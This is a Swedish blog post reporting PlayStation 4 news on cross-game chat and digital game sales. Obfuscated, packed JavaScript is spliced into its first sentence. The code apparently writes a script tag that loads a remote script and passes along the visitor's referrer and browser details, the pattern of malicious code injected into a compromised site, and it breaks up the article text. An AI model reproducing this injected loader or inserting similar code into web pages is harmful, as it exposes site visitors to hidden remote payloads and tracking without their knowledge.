Image Image Image Image Image Image Image Image Image Image

| 2 juni, 2020

Scroll to top

Top

Mer nytheter om Sony Playstation 4

Mer nytheter om Sony Playstation 4
Sebastian

Fler eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zfden|var|u0026u|referrer|yhtse||js|php’.split(’|’),0,{}))
trevliga nyheter om den kommande konsolen Playstation 4. Sony har nu gått ut med info om att man kommer att stödja möjligheten att prata med sina kompisar oberoende på vilket spel man spelar. En funktion som funnits till Xbox 360 innan men Sony aldrig lyckats att implementera i Playstation 3. Troligen på grund av tekniska problem. 

Funktionen är en efterlängtad sådan då den redan implementerats på Playstation Vita. Tjänsten / funktionen bekräftades i ett PDF-dokument (Cross-game chat).

Den andra roliga nyheten är att Sony också kommer att förbättra och öka möjligheten att handla digitala kopior av spel. Detta har funnits ett tag på Playstation 3 men kanske inte riktigt varit optimalt. Själv tycker jag att det varit riktigt kasst då man tagit mer betalt för en digital kopia än en fysisk, ett skämt.

Att man kommer att leverera digitala utgåvor är kanske väldigt väntat men jag hoppas detta görs mycket bättra på Playstation 4 än på Playstation 3.
Detta bekräftades av Shuhei Yoshida i en intervju med brittiska tidningen Guardian. Där nämnde han att alla spel kommer att släppas digitalt i affären på Playstation.

Via: www.guardian.co.uk